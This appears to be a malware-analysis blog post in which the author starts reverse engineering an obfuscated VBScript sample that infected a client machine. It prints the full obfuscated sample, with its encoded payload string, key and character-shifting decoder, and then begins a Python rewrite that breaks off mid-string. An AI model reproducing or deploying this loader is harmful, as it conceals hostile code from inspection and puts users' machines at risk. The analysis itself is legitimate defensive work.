🪲

Malware hunting

Created
Jan 6, 2022 12:47 PM
Tags
Analysis
On Jan 5, 2022, to begin the new year, my brother asked me for help to reverse engineer a weird malware that infected his client
Malware code
dim tcWKOUISRPTCiyzFzuwhUqdhgKJCUQUsKUboqeWJpPeqmAOIkkIokOEOTRUSNdCqUibloruYy tcWKOUISRPTCiyzFzuwhUqdhgKJCUQUsKUboqeWJpPeqmAOIkkIokOEOTRUSNdCqUibloruYy = "ܖ܏ܲݞݓݔݓ܏ݑݨ܏ݥݎܱܟܠۼ۹ܾݝ܏ݔݡݡݞݡ܏ݡݔݢݤݜݔ܏ݝݔݧݣۼ۹ۼ۹ݙ܏ܬ܏ݐݡݡݐݨܗܑ݆݂ݒݡݘݟݣܝ݂ݗݔݛݛܑܛܑ݂ݒݡݘݟݣݘݝݖܝܵݘݛݔ݂ݨݢݣݔݜܾݑݙݔݒݣܑܛܑ݂ݗݔݛݛܝܰݟݟݛݘݒݐݣݘݞݝܑܛܑܼݘݒݡݞݢݞݕݣܝܑܼܻܷ݇݃݃ܿܘۼ۹ݖ܏ܬ܏ݐݡݡݐݨܗܑܑܷ݄ܺܲܛܑܑܷܻܼܺܛܑܷ݄ܺܲ݋ݥݦܟݡݜܑܛܑ݋݂ݞݕݣݦݐݡݔ݋ܼݘݒݡݞݢݞݕݣ݋݆ݘݝݓݞݦݢ݋ܲݤݡݡݔݝݣ݅ݔݡݢݘݞݝ݋݁ݤݝ݋ܑܛܑܷܻܼܺ݋݂ܾ݆ܴܵ݃ܰ݁݋ܲݛݐݢݢݔݢ݋ܑܛܑܴ݁ܶݎܑ݂݉ܛܑ݋ݓݔݕݐݤݛݣݘݒݞݝ݋ܑܘۼ۹ݨܬ܏ݐݡݡݐݨܗܑݦݘݝݜݖݜݣݢܩܑܛܑݦݘݝܢܡݎݛݞݖݘݒݐݛݓݘݢݚܑܛܑ݆ݘݝܢܡݎܾݟݔݡݐݣݘݝݖ݂ݨݢݣݔݜܑܛܑݦݘݝݜݖݜݣݢܩ݋݋ݛݞݒݐݛݗݞݢݣ݋ݡݞݞݣ݋ݢݔݒݤݡݘݣݨݒݔݝݣݔݡܑܛܑܰݝݣݘ݅ݘݡݤݢܿݡݞݓݤݒݣܑܘۼ۹ۼ۹ݕݤݝݒݣݘݞݝ܏ݖݞܗݜܘۼ۹ݘݕ܏ݜܬܣ܏ݣݗݔݝۼ۹݃ܬܑݦݘݝݜݖݜݣݢܩ݋݋ݛݞݒݐݛݗݞݢݣ݋ݡݞݞݣ݋ݢݔݒݤݡݘݣݨݒݔݝݣݔݡܑۼ۹݂ݔݣ܏ܱܬܶݔݣܾݑݙݔݒݣܗݨܗܢܘܘܝܸݝݢݣݐݝݒݔݢܾݕܗݨܗܣܘܘۼ۹ݕݞݡ܏ݔݐݒݗ܏ݐ܏ݘݝ܏ݑۼ۹ݖݞܬݐܝݓݘݢݟݛݐݨܽݐݜݔۼ۹ݔݧݘݣ܏ݕݞݡۼ۹ݝݔݧݣۼ۹݂ݔݣ܏ܱܬܶݔݣܾݑݙݔݒݣܗݨܗܢܘ܏ܕ܏ܑܡܑܘܝܸݝݢݣݐݝݒݔݢܾݕܗݨܗܣܘܘۼ۹ݕݞݡ܏ݔݐݒݗ܏ݐ܏ݘݝ܏ݑۼ۹ݖݞܬݐܝݓݘݢݟݛݐݨܽݐݜݔ܏ۼ۹ݔݧݘݣ܏ݕݞݡۼ۹ݝݔݧݣۼ۹ݘݕ܏ݖݞܬܑܑ܏ݣݗݔݝ܏ݖݞܬܑܽݞݣܜݕݞݤݝݓܑۼ۹ݔݛݢݔۼ۹݂ݔݣ܏ܱܬܶݔݣܾݑݙݔݒݣܗݨܗܟܘܘܝܸݝݢݣݐݝݒݔݢܾݕܗݨܗݜܘܘۼ۹ݕݞݡ܏ݔݐݒݗ܏ݐ܏ݘݝ܏ݑۼ۹ݘݕ܏ݜ܏ܬ܏ܠ܏ݣݗݔݝۼ۹ݖݞܬݐܝݥݞݛݤݜݔݢݔݡݘݐݛݝݤݜݑݔݡۼ۹ݔݛݢݔݘݕ܏ݜ܏ܬ܏ܡ܏ݣݗݔݝۼ۹ݖݞܬݐܝݒݐݟݣݘݞݝۼ۹ݔݝݓ܏ݘݕۼ۹ݔݧݘݣ܏ݕݞݡۼ۹ݝݔݧݣۼ۹ݔݝݓ܏ݘݕۼ۹ݔݝݓ܏ݕݤݝݒݣݘݞݝ܏ۼ۹ۼ۹ݢݔݣ܏ݦ܏ܬ܏݆݂ݒݡݘݟݣۼ۹ݢݔݣ܏ݢݗ܏ܬ܏ܲݡܗܟܘۼ۹ݢݔݣ܏ݕݢ܏ܬ܏ܲݡܗܠܘۼ۹ۼ۹ܵݤݝݒݣݘݞݝ܏ܲݡܗܽܘۼ۹݂ݔݣ܏ܲݡ܏ܬ܏ܲݡݔݐݣݔܾݑݙݔݒݣܗݙܗܽܘܘۼ۹ܴݝݓ܏ܵݤݝݒݣݘݞݝۼ۹ۼ۹ݕݤݝݒݣݘݞݝ܏ܴݧܗݢܘۼ۹ܴݧ܏ܬ܏ݢݗܝܴݧݟݐݝݓܴݝݥݘݡݞݝݜݔݝݣ݂ݣݡݘݝݖݢܗܑܔܑܕݢܕܑܔܑܘۼ۹ݔݝݓ܏ݕݤݝݒݣݘݞݝۼ۹ۼ۹ݕݤݝݒݣݘݞݝ܏ܿݣܗܲܛܰܘۼ۹ܿݣܬܑܑۼ۹݂ݔݣ܏݇ܬܲݡܗܢܘۼ۹݇ܝܾݟݔݝ܏ܑܑܾ݂ܿ݃ܛܑݗݣݣݟܩܞܞݗݞݤݢݣݡݘݚݞܝݓݨݝݤܝݝݔݣܩܦܦܤܣܞܑܕܲܛݕݐݛݢݔۼ۹݇ܝݢݔݣݡݔݠݤݔݢݣݗݔݐݓݔݡ܏ܑ݄ݢݔݡܜܰݖݔݝݣܩܑܛݝݕۼ۹݇ܝݢݔݝݓ܏ܰۼ۹ܿݣܬ݇ܝݡݔݢݟݞݝݢݔݣݔݧݣۼ۹ݔݝݓ܏ݕݤݝݒݣݘݞݝۼ۹ۼ۹ܵݤݝݒݣݘݞݝ܏ݝݕۼ۹ݝݕܬܑܑۼ۹ݘܬݖݞܗܠܘۼ۹ݢܬ݅ܽ܏ܕ܏ܑݎܑ܏ܕ܏ݘۼ۹ݝݕܬݝݕܕݢܕݒۼ۹ݢܬݔݧܗܑܑܾܼ݄ܴܼܴܲܿ݃݁ܽܰܘۼ۹ݝݕܬݝݕܕݢܕݒۼ۹ݢܬݔݧܗܑܑ݄݂ܴܼܴ݁ܽܰܘۼ۹ݝݕܬݝݕܕݢܕݒۼ۹ݢܬݖݞܗܡܘۼ۹ݝݕܬݝݕܕݢܕݒۼ۹ݢܬݖݞܗܣܘۼ۹ݝݕܬݝݕܕݢܕݒܕݒܕݝݣܕݒܕݤܕݒۼ۹ܴݝݓ܏ܵݤݝݒݣݘݞݝۼ۹ۼ۹݂ݤݑ܏ܽݢۼ۹ݞݝ܏ݔݡݡݞݡ܏ݡݔݢݤݜݔ܏ݝݔݧݣۼ۹ݓݡܬݔݧܗܑܰݟݟܳݐݣݐܑܘ܏ܕ܏ܲ܏ܕ܏ݦݝۼ۹ݕݢܝܲݞݟݨܵݘݛݔ܏ݕݤܛݓݡܛݣݡݤݔۼ۹ݢݗܝݡݤݝ܏ܑݢݒݗݣݐݢݚݢ܏ܞݒݡݔݐݣݔ܏ܞݢݒ܏ݜݘݝݤݣݔ܏ܞݜݞ܏ܠ܏ܞݣݝ܏݂ݚݨݟݔ܏ܞݣݡ܏ܑ܏ܕ܏ܲݗݡ݆ܗܢܣܘ܏ܕ܏ݓݡܛݕݐݛݢݔۼ۹ݢݗܝݡݔݖݦݡݘݣݔ܏ݖܗܟܘ܏ܕ܏ݖܗܢܘ܏ܕ܏ܑ݄݉݃ܺܟܼ݉ܡܑ݂݄ܛ܏ܲݗ܏ܕ܏ݓݡ܏ܕ܏ܲݗܛ܏ݖܗܤܘۼ۹ݕݢܝݒݞݟݨݕݘݛݔ܏ݕݤܛ܏ܲݡܗܡܘܝܽݐݜݔ݂ݟݐݒݔܗܕܷܦܘܝ݂ݔݛݕܝܿݐݣݗ܏ܕܲ܏ܕ܏ݦݝ܏ܛݣݡݤݔۼ۹ݔݝݓ܏݂ݤݑۼ۹ۼ۹ݓݡܬݔݧܗܑܰݟݟܳݐݣݐܑܘ܏ܕ܏ܲ܏ܕ܏ݦݝۼ۹ۼ۹ݢݤݑ܏ݢݟݡۼ۹ݞݝ܏ݔݡݡݞݡ܏ݡݔݢݤݜݔ܏ݝݔݧݣۼ۹ݕݞݡ܏ݔݐݒݗ܏ݓݡ܏ݘݝ܏ݕݢܝݓݡݘݥݔݢۼ۹ݓݟܬݓݡܝݟݐݣݗ܏ܕ܏ݒۼ۹ݘݕ܏ݓݡܝݘݢݡݔݐݓݨ܏ܬ܏ݣݡݤݔ܏ݣݗݔݝۼ۹ݘݕ܏ݓݡܝݓݡݘݥݔݣݨݟݔ܏ܬ܏ܠ܏ݣݗݔݝۼ۹ݕݢܝݒݞݟݨݕݘݛݔ܏ݕݤܛݓݟ܏ܕ܏ݦݝܛݣݡݤݔۼ۹ݘݕ܏ݕݢܝݕݘݛݔݔݧݘݢݣݢܗݓݟ܏ܕ܏ݦݝܘ܏ݣݗݔݝۼ۹ݕݢܝݖݔݣݕݘݛݔܗݓݟ܏ܕ܏ݦݝܘܝݐݣݣݡݘݑݤݣݔݢܬܡܚܣۼ۹ݔݝݓ܏ݘݕۼ۹ݕݞݡ܏ݔݐݒݗ܏ݕݘ܏ݘݝ܏ݕݢܝݖݔݣݕݞݛݓݔݡܗݓݟܘܝݕݘݛݔݢۼ۹ݘݕ܏ݘݝݢݣݡܗݕݘܝݝݐݜݔܛܑܝܑܘ܏ݣݗݔݝۼ۹ݘݕ܏ݛݒݐݢݔܗݢݟݛݘݣܗݕݘܝݝݐݜݔܛܑܝܑܘ܏ܗݤݑݞݤݝݓܗݢݟݛݘݣܗݕݘܝݝݐݜݔܛܑܝܑܘܘܘܘ܏ܫܭܑݛݝݚܑ܏ݣݗݔݝۼ۹ݕݘܝݐݣݣݡݘݑݤݣݔݢܬܡܚܣۼ۹ݘݕ܏ݤݒݐݢݔܗݕݘܝݝݐݜݔܘ܏ܫܭ܏ݤݒݐݢݔܗݦݝܘ܏ݣݗݔݝۼ۹ݦݘݣݗ܏ݢݗܝݒݡݔݐݣݔݢݗݞݡݣݒݤݣܗݓݟ܏܏ܕ܏ݢݟݛݘݣܗݕݘܝݝݐݜݔܛܑܝܑܘܗܟܘ܏ܕ܏ܑܝݛݝݚܑܘ܏ۼ۹ܝݦݘݝݓݞݦݢݣݨݛݔ܏ܬ܏ܦۼ۹ܝݣݐݡݖݔݣݟݐݣݗ܏ܬ܏ܑݒݜݓܝݔݧݔܑۼ۹ܝݐݡݖݤݜݔݝݣݢ܏ܬ܏ܑܞݒ܏ݢݣݐݡݣ܏ܑ܏ܕ܏ݡݔݟݛݐݒݔܗݦݝܛܑ܏ܑܛ܏ݒݗ܏ܕ܏ܑ܏ܑ܏ܕ܏ݒݗܘ܏ܕ܏ܑܕݢݣݐݡݣ܏ܑ܏ܕ܏ݡݔݟݛݐݒݔܗݕݘܝݝݐݜݔܛܑ܏ܑܛ܏ݒݗ܏ܕ܏ܑ܏ܑ܏ܕ܏ݒݗܘ܏ܕܑܕݔݧݘݣܑۼ۹ݕݘݒ܏ܬ܏ݢݗܝݡݔݖݡݔݐݓܗݖܗܣܘ܏ܕ܏ݢݗܝݡݔݖݡݔݐݓܗݖܗܣܘ܏ܕ܏ܑܝܑ܏ܕ܏ݢݟݛݘݣܗݕݘܝݝݐݜݔܛ܏ܑܝܑܘܗݤݑݞݤݝݓܗݢݟݛݘݣܗݕݘܝݝݐݜݔܛ܏ܑܝܑܘܘܘܕ܏ݒܘ܏ܕ܏ݖܗܥܘܘ܏ۼ۹ݘݕ܏ݘݝݢݣݡܗݘݒݞݝݛݞݒݐݣݘݞݝܛܑܛܑܘ܏ܬ܏ܟ܏ݣݗݔݝۼ۹ܝݘݒݞݝݛݞݒݐݣݘݞݝ܏ܬ܏ݕݘܝݟݐݣݗۼ۹ݔݛݢݔ܏ۼ۹ܝݘݒݞݝݛݞݒݐݣݘݞݝ܏ܬ܏ݕݘݒۼ۹܏ݔݝݓ܏ݘݕۼ۹ܝݢݐݥݔܗܘۼ۹ݔݝݓ܏ݦݘݣݗۼ۹ݔݝݓ܏ݘݕۼ۹ݔݝݓ܏ݘݕۼ۹ݔݝݓ܏ݘݕۼ۹ݝݔݧݣۼ۹ݕݞݡ܏ݔݐݒݗ܏ݕݞ܏ݘݝ܏ݕݢܝݖݔݣݕݞݛݓݔݡܗݓݟܘܝݢݤݑݕݞݛݓݔݡݢۼ۹ݕݞܝݐݣݣݡݘݑݤݣݔݢܬܡܚܣۼ۹ݦݘݣݗ܏ݢݗܝݒݡݔݐݣݔݢݗݞݡݣݒݤݣܗݓݟ܏ܕ܏ݕݞܝݝݐݜݔ܏ܕ܏ܑܝݛݝݚܑܘۼ۹ܝݦݘݝݓݞݦݢݣݨݛݔܬܦۼ۹ܝݣݐݡݖݔݣݟݐݣݗܬܑݒݜݓܝݔݧݔܑۼ۹ܝݐݡݖݤݜݔݝݣݢܬܑܞݒ܏ݢݣݐݡݣ܏ܑ܏ܕ܏ݡݔݟݛݐݒݔܗݦݝܛܑ܏ܑܛ܏ݒݗ܏ܕ܏ܑ܏ܑ܏ܕ܏ݒݗܘ܏ܕ܏ܑܕݢݣݐݡݣ܏ݔݧݟݛݞݡݔݡ܏ܑ܏ܕ܏ݡݔݟݛݐݒݔܗݕݞܝݝݐݜݔܛܑ܏ܑܛ܏ݒݗ܏ܕ܏ܑ܏ܑ܏ܕ܏ݒݗܘ܏ܕܑܕݔݧݘݣܑۼ۹ݕݘݒܬݢݗܝݡݔݖݡݔݐݓܗܑܷܻܼܺ݋ݢݞݕݣݦݐݡݔ݋ݒݛݐݢݢݔݢ݋ݕݞݛݓݔݡܑ܏ܕ܏ݖܗܥܘܘۼ۹ݘݕ܏ݘݝݢݣݡܗܝݘݒݞݝݛݞݒݐݣݘݞݝܛܑܛܑܘܬܟ܏ݣݗݔݝۼ۹ܝݘݒݞݝݛݞݒݐݣݘݞݝܬݕݞܝݟݐݣݗۼ۹ݔݛݢݔۼ۹ܝݘݒݞݝݛݞݒݐݣݘݞݝܬݕݘݒۼ۹ݔݝݓ܏ݘݕۼ۹ܝݢݐݥݔܗܘۼ۹ݔݝݓ܏ݦݘݣݗۼ۹ݝݔݧݣۼ۹ݔݝݓ܏ݘݕۼ۹ݔݝݓ܏ݘݕۼ۹ݝݔݧݣۼ۹ݔݡݡܝݒݛݔݐݡۼ۹ݔݝݓ܏ݢݤݑۼ۹ۼ۹ۼ۹ۼ۹ݥݝܬܑ݆ݘݝݓݞݦݢܑۼ۹݄ܬܑܑۼ۹ۼ۹ݒݗ܏ܬ܏ݒݗݡݦܗܢܣܘۼ۹ݒ܏ܬ܏ݒݗݡݦܗܨܡܘۼ۹ݕݤ܏ܬ܏ݦܝݢݒݡݘݟݣݕݤݛݛݝݐݜݔۼ۹ݦݝܬݦܝݢݒݡݘݟݣݝݐݜݔۼ۹ܽ݃ܬܑܽݞܑۼ۹ݘݕ܏ݕݢܝݕݘݛݔݔݧݘݢݣݢܗݔݧܗܑ݆ݘݝݓݘݡܑܘ܏ܕ܏ܑ݋ܼݘݒݡݞݢݞݕݣܝܴܽ݃݋ܵݡݐݜݔݦݞݡݚ݋ݥܡܝܟܝܤܟܦܡܦ݋ݥݑݒܝݔݧݔܑܘ܏ݣݗݔݝۼ۹ܽ݃ܬܑ݈ݔݢܑۼ۹ݔݝݓ܏ݘݕۼ۹ۼ۹݄ܬ܏ݢݗܝݡݔݖݡݔݐݓܗݖܗܡܘܘۼ۹ݘݕ܏݄ܬܑܑ܏ݣݗݔݝۼ۹ݘݕ܏ݜݘݓܗݕݤܛܡܘܬܑܩ݋ܑ܏ܕ܏ݦݝ܏ݣݗݔݝۼ۹݄ܬܑܑ݄ܴ݃݁ۼ۹ݢݗܝݡݔݖݦݡݘݣݔ܏ݖܗܡܘܛ܏݄ܛ܏ݖܗܤܘۼ۹ݔݛݢݔۼ۹݄ܬܑܑܻ݂ܴܵܰۼ۹ݢݗܝݡݔݖݦݡݘݣݔ܏ݖܗܡܘܛ܏݄ܛ܏ݖܗܤܘۼ۹ݔݝݓ܏ݘݕۼ۹ݔݝݓ܏ݘݕۼ۹ۼ۹ܽݢۼ۹ݢݟݛܬܑݫ݅ݫܑۼ۹ݦݗݘݛݔ܏ݣݡݤݔۼ۹ݢܬݢݟݛݘݣܗܿݣܗܑ݅ݡݔܑܛܑܑܘܛݢݟݛܘۼ۹ݢݔݛݔݒݣ܏ݒݐݢݔ܏ݢܗܟܘۼ۹ݒݐݢݔ܏ܑݔݧݒܑۼ۹ݢݐܬ܏ݢܗܠܘۼ۹ݔݧݔݒݤݣݔ܏ݢݐۼ۹ݒݐݢݔ܏ܑ݂ݒܑۼ۹ݢܡ܏ܬ܏ܴݧܗܑݣݔݜݟܑܘ܏ܕ܏ܑ݋ܑ܏ܕ܏ݢܗܡܘۼ۹ݢݔݣ܏ݦݡ܏ܬ܏ݕݢܝܾݟݔݝ݃ݔݧݣܵݘݛݔܗݢܡܛܡܛ݃ݡݤݔܘۼ۹ݦݡܝ݆ݡݘݣݔ܏ݢܗܠܘۼ۹ݦݡܝܲݛݞݢݔܗܘۼ۹ݢݗܝݡݤݝ܏ݢܡܛ܏ܥۼ۹ݒݐݢݔ܏ܑܑ݁ܵۼ۹ݢܡ܏ܬ܏ܴݧܗܑݣݔݜݟܑܘ܏ܕ܏ܑ݋ܑ܏ܕ܏ݢܗܡܘۼ۹ݢݔݣ܏ݦݡ܏ܬ܏ݕݢܝܾݟݔݝ݃ݔݧݣܵݘݛݔܗݢܡܛܡܛ݃ݡݤݔܘۼ۹ݦݡܝ݆ݡݘݣݔ܏ݢܗܠܘۼ۹ݦݡܝܲݛݞݢݔܗܘۼ۹ݢݗܝݡݤݝ܏ݢܡۼ۹ݒݐݢݔ܏ܑ݁ݔݝܑۼ۹ݢݔݣ܏ݦݡ܏ܬ܏ݕݢܝܾݟݔݝ݃ݔݧݣܵݘݛݔܗݕݤܛܠܘۼ۹ݕ܏ܬ܏ݦݡܝ݁ݔݐݓܰݛݛۼ۹ݦݡܝݒݛݞݢݔܗܘۼ۹ݕ܏ܬ܏ݡݔݟݛݐݒݔܗݕܛݒݗܕݥݝܕݒݗܛݒݗܕݢܗܠܘܕݒݗܘۼ۹ݢݔݣ܏ݦݡ܏ܬ܏ݕݢܝܾݟݔݝ݃ݔݧݣܵݘݛݔܗݕݤܛܡܛݕݐݛݢݔܘۼ۹ݦݡܝ݆ݡݘݣݔ܏ݕۼ۹ݦݡܝݒݛݞݢݔܗܘۼ۹ݒݐݢݔ܏ܑ݄ݟܑۼ۹ݢݔݣ܏ݦݡ܏ܬ܏ݕݢܝܾݟݔݝ݃ݔݧݣܵݘݛݔܗݕݤܛܡܛݕݐݛݢݔܘۼ۹ݢܗܠܘ܏ܬ܏ݡݔݟݛݐݒݔܗݢܗܠܘܛܑݫ݄ݫܑܛܑݫ݅ݫܑܘۼ۹ݦݡܝ݆ݡݘݣݔ܏ݢܗܠܘۼ۹ݦݡܝܲݛݞݢݔܗܘۼ۹ݢݗܝݡݤݝ܏ܑݦݢݒݡݘݟݣܝݔݧݔ܏ܞܞܱ܏ܑ܏ܕ܏ݒݗ܏ܕ܏ݕݤ܏ܕ܏ݒݗܛ܏ܥۼ۹ݦܝݠݤݘݣۼ۹ݒݐݢݔ܏ܑܲݛܑۼ۹݆ܝݠݤݘݣ܏ۼ۹ݒݐݢݔ܏ܑ݄ݝܑۼ۹݂ܗܠܘ܏ܬ܏ݡݔݟݛݐݒݔܗ݂ܗܠܘܛܑܔݕܑܛݕݤܘۼ۹݂ܗܠܘ܏ܬ܏ݡݔݟݛݐݒݔܗ݂ܗܠܘܛܑܔݝܑܛݦݝܘۼ۹݂ܗܠܘ܏ܬ܏ݡݔݟݛݐݒݔܗ݂ܗܠܘܛܑܔݢݕݓݡܑܛݓݡܘۼ۹ݔݧݔݒݤݣݔ܏݂ܗܠܘۼ۹ݦܝݠݤݘݣۼ۹ݔݝݓ܏ݢݔݛݔݒݣۼ۹݆ܝ݂ݛݔݔݟ܏ܥܟܟܟۼ۹݂ݟݡۼ۹ݦݔݝݓ" QhabtGxPVSmqaodFuleiyhMdMORySQPKnEsCXZoecOhKXInmYYJkZyGiPdBJHiBTHICAOhhOzZhDBVFLYVGxNRf = "" Dim wVHjbbCiUkelksgSYsGkDSVRUNaCwPyrpLDfoKiLOSqLnUHvJGjedRiyUqBUCsCZpOtcggZk wVHjbbCiUkelksgSYsGkDSVRUNaCwPyrpLDfoKiLOSqLnUHvJGjedRiyUqBUCsCZpOtcggZk = 0 dim mvJPJeMCCsyxVAxhAqnBiKQdAlgucQMhQwYrMBrrThnhkbwYxQMGnhjAEaeNbNyLmxVJGchyPbsjkTGlVQkowDF mvJPJeMCCsyxVAxhAqnBiKQdAlgucQMhQwYrMBrrThnhkbwYxQMGnhjAEaeNbNyLmxVJGchyPbsjkTGlVQkowDF = 0 dim CSPCBHxJqYLpeDlsoMVtwtJREUYqwAUQgiZBRnxppFbMsrHCxajcaGGBEaKjPBpbfnRatfqhDmflLNKFLKlVpHl dim qwsUAtkNvyFxPLCTpPFcyKJalLKiStlbmCGZGEXTqqKbxqDxytkvmrpOgXcsMADtfKuaecbWffDJndqogONubFu CSPCBHxJqYLpeDlsoMVtwtJREUYqwAUQgiZBRnxppFbMsrHCxajcaGGBEaKjPBpbfnRatfqhDmflLNKFLKlVpHl = "HGFTYtdcyfsaty!@#FFDS" qwsUAtkNvyFxPLCTpPFcyKJalLKiStlbmCGZGEXTqqKbxqDxytkvmrpOgXcsMADtfKuaecbWffDJndqogONubFu = 0 do until mvJPJeMCCsyxVAxhAqnBiKQdAlgucQMhQwYrMBrrThnhkbwYxQMGnhjAEaeNbNyLmxVJGchyPbsjkTGlVQkowDF = len(CSPCBHxJqYLpeDlsoMVtwtJREUYqwAUQgiZBRnxppFbMsrHCxajcaGGBEaKjPBpbfnRatfqhDmflLNKFLKlVpHl) mvJPJeMCCsyxVAxhAqnBiKQdAlgucQMhQwYrMBrrThnhkbwYxQMGnhjAEaeNbNyLmxVJGchyPbsjkTGlVQkowDF = mvJPJeMCCsyxVAxhAqnBiKQdAlgucQMhQwYrMBrrThnhkbwYxQMGnhjAEaeNbNyLmxVJGchyPbsjkTGlVQkowDF + 1 qwsUAtkNvyFxPLCTpPFcyKJalLKiStlbmCGZGEXTqqKbxqDxytkvmrpOgXcsMADtfKuaecbWffDJndqogONubFu = qwsUAtkNvyFxPLCTpPFcyKJalLKiStlbmCGZGEXTqqKbxqDxytkvmrpOgXcsMADtfKuaecbWffDJndqogONubFu + AscW(mid(CSPCBHxJqYLpeDlsoMVtwtJREUYqwAUQgiZBRnxppFbMsrHCxajcaGGBEaKjPBpbfnRatfqhDmflLNKFLKlVpHl,mvJPJeMCCsyxVAxhAqnBiKQdAlgucQMhQwYrMBrrThnhkbwYxQMGnhjAEaeNbNyLmxVJGchyPbsjkTGlVQkowDF,1)) loop do until wVHjbbCiUkelksgSYsGkDSVRUNaCwPyrpLDfoKiLOSqLnUHvJGjedRiyUqBUCsCZpOtcggZk = Len(tcWKOUISRPTCiyzFzuwhUqdhgKJCUQUsKUboqeWJpPeqmAOIkkIokOEOTRUSNdCqUibloruYy) wVHjbbCiUkelksgSYsGkDSVRUNaCwPyrpLDfoKiLOSqLnUHvJGjedRiyUqBUCsCZpOtcggZk= wVHjbbCiUkelksgSYsGkDSVRUNaCwPyrpLDfoKiLOSqLnUHvJGjedRiyUqBUCsCZpOtcggZk + 1 QhabtGxPVSmqaodFuleiyhMdMORySQPKnEsCXZoecOhKXInmYYJkZyGiPdBJHiBTHICAOhhOzZhDBVFLYVGxNRf = QhabtGxPVSmqaodFuleiyhMdMORySQPKnEsCXZoecOhKXInmYYJkZyGiPdBJHiBTHICAOhhOzZhDBVFLYVGxNRf & ChrW(AscW(Mid(tcWKOUISRPTCiyzFzuwhUqdhgKJCUQUsKUboqeWJpPeqmAOIkkIokOEOTRUSNdCqUibloruYy, wVHjbbCiUkelksgSYsGkDSVRUNaCwPyrpLDfoKiLOSqLnUHvJGjedRiyUqBUCsCZpOtcggZk, 1)) - qwsUAtkNvyFxPLCTpPFcyKJalLKiStlbmCGZGEXTqqKbxqDxytkvmrpOgXcsMADtfKuaecbWffDJndqogONubFu + len(CSPCBHxJqYLpeDlsoMVtwtJREUYqwAUQgiZBRnxppFbMsrHCxajcaGGBEaKjPBpbfnRatfqhDmflLNKFLKlVpHl)) loop Wscript.Echo QhabtGxPVSmqaodFuleiyhMdMORySQPKnEsCXZoecOhKXInmYYJkZyGiPdBJHiBTHICAOhhOzZhDBVFLYVGxNRf
Malware’s script in Visual Basic
At first, it looks encoded. However, you can notice clear Visual Basic typed functions and variables in it, meaning it is only obfuscated.
So, I opened a new Python script and started to retype the whole code with clear variable names to deeply understand the mathematical calculation of the script.
Rewritten code
def mid(s, offset, amount): return s[offset-1:offset+amount-1] var5 = "HGFTYtdcyfsaty!@#FFDS" var6 = 0 for x in range(1, len(var5)+1): var6 += ord(mid(var5, x, 1)) print(var6) var1 = "ܖ܏ܲݞݓݔݓ܏ݑݨ܏ݥݎܱܟܠۼ۹ܾݝ܏ݔݡݡݞݡ܏ݡݔݢݤݜݔ܏ݝݔݧݣۼ۹ۼ۹ݙ܏ܬ܏ݐݡݡݐݨܗܑ݆݂ݒݡݘݟݣܝ݂ݗݔݛݛܑܛܑ݂ݒݡݘݟݣݘݝݖܝܵݘݛݔ݂ݨݢݣݔݜܾݑݙݔݒݣܑܛܑ݂ݗݔݛݛܝܰݟݟݛݘݒݐݣݘݞݝܑܛܑܼݘݒݡݞݢݞݕݣܝܑܼܻܷ݇݃݃ܿܘۼ۹ݖ܏ܬ܏ݐݡݡݐݨܗܑܑܷ݄ܺܲܛܑܑܷܻܼܺܛܑܷ݄ܺܲ݋ݥݦܟݡݜܑܛܑ݋݂ݞݕݣݦݐݡݔ݋ܼݘݒݡݞݢݞݕݣ݋݆ݘݝݓݞݦݢ݋ܲݤݡݡݔݝݣ݅ݔݡݢݘݞݝ݋݁ݤݝ݋ܑܛܑܷܻܼܺ݋݂ܾ݆ܴܵ݃ܰ݁݋ܲݛݐݢݢݔݢ݋ܑܛܑܴ݁ܶݎܑ݂݉ܛܑ݋ݓݔݕݐݤݛݣݘݒݞݝ݋ܑܘۼ۹ݨܬ܏ݐݡݡݐݨܗܑݦݘݝݜݖݜݣݢܩܑܛܑݦݘݝܢܡݎݛݞݖݘݒݐݛݓݘݢݚܑܛܑ݆ݘݝܢܡݎܾݟݔݡݐݣݘݝݖ݂ݨݢݣݔݜܑܛܑݦݘݝݜݖݜݣݢܩ݋݋ݛݞݒݐݛݗݞݢݣ݋ݡݞݞݣ݋ݢݔݒݤݡݘݣݨݒݔݝݣݔݡܑܛܑܰݝݣݘ݅ݘݡݤݢܿݡݞݓݤݒݣܑܘۼ۹ۼ۹ݕݤݝݒݣݘݞݝ܏ݖݞܗݜܘۼ۹ݘݕ܏ݜܬܣ܏ݣݗݔݝۼ۹݃ܬܑݦݘݝݜݖݜݣݢܩ݋݋ݛݞݒݐݛݗݞݢݣ݋ݡݞݞݣ݋ݢݔݒݤݡݘݣݨݒݔݝݣݔݡܑۼ۹݂ݔݣ܏ܱܬܶݔݣܾݑݙݔݒݣܗݨܗܢܘܘܝܸݝݢݣݐݝݒݔݢܾݕܗݨܗܣܘܘۼ۹ݕݞݡ܏ݔݐݒݗ܏ݐ܏ݘݝ܏ݑۼ۹ݖݞܬݐܝݓݘݢݟݛݐݨܽݐݜݔۼ۹ݔݧݘݣ܏ݕݞݡۼ۹ݝݔݧݣۼ۹݂ݔݣ܏ܱܬܶݔݣܾݑݙݔݒݣܗݨܗܢܘ܏ܕ܏ܑܡܑܘܝܸݝݢݣݐݝݒݔݢܾݕܗݨܗܣܘܘۼ۹ݕݞݡ܏ݔݐݒݗ܏ݐ܏ݘݝ܏ݑۼ۹ݖݞܬݐܝݓݘݢݟݛݐݨܽݐݜݔ܏ۼ۹ݔݧݘݣ܏ݕݞݡۼ۹ݝݔݧݣۼ۹ݘݕ܏ݖݞܬܑܑ܏ݣݗݔݝ܏ݖݞܬܑܽݞݣܜݕݞݤݝݓܑۼ۹ݔݛݢݔۼ۹݂ݔݣ܏ܱܬܶݔݣܾݑݙݔݒݣܗݨܗܟܘܘܝܸݝݢݣݐݝݒݔݢܾݕܗݨܗݜܘܘۼ۹ݕݞݡ܏ݔݐݒݗ܏ݐ܏ݘݝ܏ݑۼ۹ݘݕ܏ݜ܏ܬ܏ܠ܏ݣݗݔݝۼ۹ݖݞܬݐܝݥݞݛݤݜݔݢݔݡݘݐݛݝݤݜݑݔݡۼ۹ݔݛݢݔݘݕ܏ݜ܏ܬ܏ܡ܏ݣݗݔݝۼ۹ݖݞܬݐܝݒݐݟݣݘݞݝۼ۹ݔݝݓ܏ݘݕۼ۹ݔݧݘݣ܏ݕݞݡۼ۹ݝݔݧݣۼ۹ݔݝݓ܏ݘݕۼ۹ݔݝݓ܏ݕݤݝݒݣݘݞݝ܏ۼ۹ۼ۹ݢݔݣ܏ݦ܏ܬ܏݆݂ݒݡݘݟݣۼ۹ݢݔݣ܏ݢݗ܏ܬ܏ܲݡܗܟܘۼ۹ݢݔݣ܏ݕݢ܏ܬ܏ܲݡܗܠܘۼ۹ۼ۹ܵݤݝݒ